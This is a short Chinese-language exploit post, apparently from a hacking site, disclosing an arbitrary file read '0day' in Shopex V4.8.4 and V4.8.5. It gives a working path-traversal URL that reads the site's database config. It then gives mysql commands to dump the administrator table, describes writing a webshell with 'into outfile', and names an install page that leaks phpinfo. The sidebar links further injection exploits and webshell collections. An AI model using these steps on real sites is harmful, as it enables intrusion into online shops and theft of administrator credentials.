会员投稿
投稿指南Shopex V4.8.4 V4.8.5 0Day 通杀
日期:2011-07-22
点击:202
来源: 未知
发布日期:2010-04-22
发布作者:dbgger
影响版本: Shopex V4.8.4 V4.8.5
漏洞描述: 文件过滤不严,导致任意文件读取漏洞。
测试代码:
http://www.xxxx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
可以连上数据库.
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell,没有仔细研究.
我测试的站,直接用into outfile 一个shell.
网上有个帖子,说可以爆物理路径.测试不可用.
如果install目录没删.下面这个可以看phpinfo
http://www.target.com/install/svinfo.php?phpinfo=true
另外/home/cache/目录的文件,也是可以爆出来的.
目前shopex 官方站,仍然存在该漏洞. 测试截图如下
Tags: TIME_WAIT UTF-8 privoxy mgr Fedora 13 下载
相关文章列表:
推荐内容
最新文章
- linux下nmap的使用-linux网络扫描技术
- dedecms 5.5 0day 转载
- PHP推荐禁用函数disable_functions PHP安全配置
- Aspcms 1.5 COOKIES注入0day
- (CentOS+Nginx+PHP+Mysql)配置和WEB服务器安全配置
- espcms最新注入0day
- emseasy最新注入漏洞
- 史上最全的各个脚本的一句话木马
- Linux 递归经典:fork 炸弹
- phpcms 2008最新0day加批量EXP代码 2011年11月
- SiteServer 3.4.4最新SQL注入0day
- ECSHOP 2.7.2最新盲注漏洞
- C语言之父丹尼斯·里奇也登船了
- 微软WP7手机系统摄像头非法跟踪用户坐标
- 黑客称德国绿坝时时监控网络用户
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史